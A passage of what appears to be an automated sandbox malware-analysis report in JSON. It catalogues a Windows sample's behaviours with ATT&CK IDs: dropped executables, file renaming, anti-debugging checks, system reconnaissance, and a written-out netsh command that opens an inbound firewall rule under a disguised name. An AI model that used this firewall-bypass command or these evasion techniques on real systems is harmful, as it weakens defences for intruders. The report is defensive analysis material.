\"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"HIDEONDESKTOPPERUSER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"evryposw.exe.67EE49C3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"evryposw.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\evryposw.exe]- [targetUID: 00000000-00003340]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"evryposw.exe.67EE49C3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"evryposw.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\evryposw.exe]- [targetUID: 00000000-00003340]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\evryposw.exe\" to \"%WINDIR%\\system32\\fbjtauwa\\evryposw.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00004612-00000105-232765 [PID: 4612]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004612-00000105-1627085 [PID: 4612]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004612-00000105-2180901 [PID: 4612]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004612-00000105-2978309 [PID: 4612]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004612-00000105-3188943 [PID: 4612]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004612-00000105-4028826 [PID: 4612]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004612-00000105-4230103 [PID: 4612]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004612-00000105-4805359 [PID: 4612]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00004740-00000105-106353 [PID: 4740]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00004740-00000105-1206360 [PID: 4740]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F140000\n \"evryposw.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F140000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F140000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"netsh.exe\" called \"FindResourceW\" with parameter \"3585\" - (UID: 00000000-00004612)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00004612-00000105-7470420", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" queries volume information of \"C:\\\" at 00000000-00004600-0000010C-2498857\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" queries volume information of \"C:\\\" at 00000000-00004600-0000010C-2500184\n \"evryposw.exe\" queries volume information of \"C:\\\" at 00000000-00004152-0000010C-1372612\n \"evryposw.exe\" queries volume information of \"C:\\\" at 00000000-00004152-0000010C-1373826\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004740-0000010C-63513\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004740-0000010C-1435106\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004740-0000010C-1771213\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004740-0000010C-1772724", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c0a718003cfc3500145c2277435c227708fd3500010000009401160001000000bcfb3500935c237740832a77d4a02277a532067708fd3500010000000100000080c71900000000008cfb3500bcfb350028fc350095e11e77e1cd1100feffffffd4a022771bbe14750000df7600000000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c217743791475ffffffff0c0000004c6221771f791475ffffffff0c00000064ec120004000000000400000100000078ec12000a0e260000000000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006c0600000088ea0c76ecf91200b344a96c88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b40001f084eb5bcf51200616b400088000000f822410081a80c76ecf912000000900100cee0000002000008000000d4275f00 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb6176d83f1e000090fd7f9a5c237700e0fd7fb0c966014490fd7f00000000400000003f000000240000000090fd7fa4c96601c15c237760822a77240000000090fd7f9a5c237700e0fd7fc8c966015789227780832a7713171575d8eb6176 (UID: 00000000-00004600)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000b00646007cf86b00145c2277435c227748f96b00010000009401430001000000fcf76b00935c237740832a77d4a022776300587748f96b000100000001000000d0e6450000000000ccf76b00fcf76b0068f86b0095e11e7767f31100feffffffd4a022771bbe14750000df7600000000 (UID: 00000000-00002920)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000009e0b006cf63800145c2277435c227738f73800010000009401090001000000ecf53800935c237740832a77d4a02277760a0b7738f73800010000000100000008ea0b0000000000bcf53800ecf5380058f6380095e11e7762fb1100feffffffd4a022771bbe14750000df7600000000 (UID: 00000000-00002876)\n \"evryposw.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c217743791475ffffffff0c0000004c6221771f791475ffffffff0c00000064ec120004000000000400000100000078ec12000a0e170000000000 (UID: 00000000-00004152)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" queries volume information of \"C:\\\" at 00000000-00004600-0000010C-2498857\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" queries volume information of \"C:\\\" at 00000000-00004600-0000010C-2500184\n \"evryposw.exe\" queries volume information of \"C:\\\" at 00000000-00004152-0000010C-1372612\n \"evryposw.exe\" queries volume information of \"C:\\\" at 00000000-00004152-0000010C-1373826\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004740-0000010C-63513\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004740-0000010C-1435106\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004740-0000010C-1771213\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004740-0000010C-1772724", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00004740)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ed001c020000000000000000000000000000000000000400e8001c0200000000000000000000087016000000000020000000000000000000000078491800f86c1600186e1600e0c81800c071160000000000ccf935000000000028fc350095e11e7709d51100feffffffff2b22779a2a227764c5e476b69f2277000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c5e476e0c8180064c5e476 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e7100fce2120080f44676000071000000000089f4467655cf6db50200000070e312006ce3120064e2120068e2120018e4120095e11e7709d51100c0e21200c83a507634e31200d58c487670e3120004e3120042a44676a802507644e31200d2f44676080000006ef5467644f54676edce6db50200000070aa146f0000130026bb146f18e31200020000000000130070aa146f48e3120042a44676a80250768ce3120010a9146f08000000e6a8146fed76b4b50200000070aa146f0000130026bb146fac0e7100780e710058e312008050206f18e41200f9f2186f893db2da (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000079ccdb590300000044e56601ff193ab4741200008ce56601c0e46601590000000300000048e4660150e4660118e66601d0bbaa6ccb6df0d9feffffff98e56601bfe5a96c79ccdb5998e56601cce5a96c0600000000001b6a01000000dfe5a96c3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56601000000008e00000044e66601feffffffcce56601cf002377d6002377d52c55768e0000004700000044e6660100000000a0e566010000000008e66601 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ca2e1bb544de66016d821776d4181e0004010000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006500610038006100350035003200650066003600330064003300340030003400340037003700030000000000000002000000583e1e00f84b1800f86c16003200020001000000260200000b0000000000000000000000004c1800f40100000a000000c071160005000000000000003200000038461e00f0c86601cc412377583e1e0028000000fc000000ff2b2277e9015576d8eb6176ac0116000000160028003400010000000000000000000000040000000100000029002f00010000001200000001000000000000000000000008701600f8070000200000000000000000000000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000160010b32000000000003e00003e340000c038b5200040cd200018921800f0010000000016000400000010b32000acee66010464227738011600e0632277b5275576000000000000160018b320006dd10c7676f718b46caee9760000000000000000f001000040cd2000d82f16000100000000001600500116000c00000018b32000d82f1600020000021800000055200075820000000000000000000000030000004cee6601820000007f070000000000005520007502000000c075147640cd200000000000c075147668ee6601e830160000000000d82f1600c0ee6601ff2b2277 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000007f85abcb0300000044e56601ff193ab40c0900008ce56601c0e466015b0000000300000048e4660150e4660118e66601d0bbaa6ccb6df0d9feffffff98e56601bfe5a96c7f85abcb98e56601cce5a96c8205000000001b6a01000000dfe5a96c3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000160030ae20000000000058000058340000c058b02000c8ce2000f8861d00c0020000000016000000001030ae2000acee66010464227738011600e0632277b5275576000000000000160038ae20006dd10c7676f718b46caee9760000000000000000e0000000c8ce2000d82f16000100000000001600500116000c00000038ae2000d82f16000200000218000000bf0200bd9c0000000000000000000000030000004cee66019c0000003f020000000000004f3a00751c000000c0751476701d220000000000c075147668ee66014030160000000000d82f1600c0ee6601ff2b2277 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000bc54e4e50300000044e56601ff193ab4700900008ce56601c0e466015b0000000300000048e4660150e4660118e66601d0bbaa6ccb6df0d9feffffff98e56601bfe5a96cbc54e4e598e56601cce5a96c8205000000001b6a01000000dfe5a96c3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004600)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"IsWow64Process\" with parameter \"4600\" - (UID: 00000000-00004600)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004600)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004600)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"evryposw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004612)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004612)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00004600)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000c2502cca5bd700000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000882dee676433ee670000000000000000\" - (UID: 00000000-00004740)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"evryposw.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"evryposw.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"4061d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"2422592\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004612)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004612)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port 